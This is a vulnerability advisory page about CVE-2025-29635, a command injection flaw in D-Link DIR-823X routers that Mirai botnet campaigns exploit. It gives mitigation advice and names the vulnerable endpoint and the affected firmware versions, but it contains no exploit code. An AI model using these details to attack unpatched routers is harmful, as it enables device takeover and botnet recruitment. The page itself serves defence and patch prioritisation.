CVE-2025-29635 - PatchNow

📋 Vulnerability Details

Data Source: CIRCL

Confidence: HIGH

Exploitation Method: DIRECT_NETWORK

CVE Published: 2025-03-25

Added to CISA KEV: 2026-04-24 395 DAYS BETWEEN CVE AND KEV

🎯 Recommendations:

CRITICAL: Check for indicators of compromise - this vulnerability is in CISA KEV indicating active exploitation in the wild. Review router logs, check for unauthorized access, verify system integrity, and scan for botnet activity
Immediately update D-Link DIR-823X firmware to latest available version
Disable remote/WAN management access if not absolutely required
Change default administrator credentials to strong, unique passwords
Monitor network traffic for unusual outbound connections indicating botnet activity
Consider replacing device if firmware updates are not available
Patch priority: CRITICAL - Immediate action required

🔍 Web Intelligence (Kagi · 2026-06-04)

CVE-2025-29635 is a critical command injection vulnerability affecting D-Link DIR-823X series routers ^[1].

Active Exploitation and Threat Actor Usage

Active Exploitation: The vulnerability has been actively exploited in the wild ^[1].
Threat Actor Usage: It has been specifically targeted by Mirai botnet campaigns, which leverage the vulnerability to compromise devices and incorporate them into their botnet infrastructure ^[1].

Attack Method and Requirements

Method: The vulnerability is a command injection flaw triggered by sending a specially crafted `POST` request to the `/goform/set_prohibiting` endpoint ^[2].
Requirements:

* Network Access: It is a remote vulnerability, meaning it can be exploited over the network ^[2]. * User Interaction: No user interaction is required for successful exploitation ^[5]. * Authentication: While some sources initially noted it as requiring an "authorized" attacker, active exploitation by botnets indicates it is being used to achieve remote command execution on vulnerable devices ^[2].

Impact

Access/Impact: Successful exploitation grants an attacker the ability to execute arbitrary shell commands on the target device ^[3]. This results in full control over system processes and data, leading to a total loss of confidentiality, integrity, and availability for the device ^[3].
Campaign Type: It is primarily associated with botnet recruitment (Mirai) rather than ransomware or targeted espionage campaigns ^[1].

Proof-of-Concept (PoC) Availability

Publicly available exploit code or PoC details have been observed and are being leveraged by attackers to scan for and compromise vulnerable devices ^[1].

Affected Versions and Mitigation

Affected Products: D-Link DIR-823X series routers running firmware versions 240126 and 240802 (sometimes cited as 24082) ^[2] ^[1].
Status: These devices were declared retired by the vendor as of September 2025 ^[1]. Because they are end-of-life, users are strongly advised to replace these devices, as they are no longer receiving security updates ^[4].

Sources

CVE-2025-29635: Mirai Campaign Targets D-Link Devices - Akamai
Read about the active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 discovered by the Akamai SIRT. ... CVE-2025-29635, which was publicly disclosed in late March 2025, is a command injection vulnerability in D-Link DIR-823X series routers that affects firmware ve…
NVD - CVE-2025-29635
CVE-2025-29635 Detail Description A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execut…
CVE-2025-29635 - Vulnerability Details - OpenCVE
This action injects arbitrary shell commands, granting the attacker full control over system processes and data. The weakness aligns with CWE‑77, indicating that unsanitized command execution is possible. The impact is a loss of confidentiality, integrity, and availability for the affected device. .
Command Injection in Vivotek Legacy Firmware: What You... | Akamai
This vulnerability highlights the critical security risks in IoT devices. Organizations with affected cameras should prioritize patches, and users should be informed about risks to take protective measures.Read about the active exploitation attempts of the D-Link command injection vulnerability CVE-…
A command injection vulnerability in D-Link...
Affected versions.Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability. Attack complexity: More severe for the least complex attacks. Privileges required: More severe if no privileges are required. User interaction: More s…

🔴 CVE-2025-29635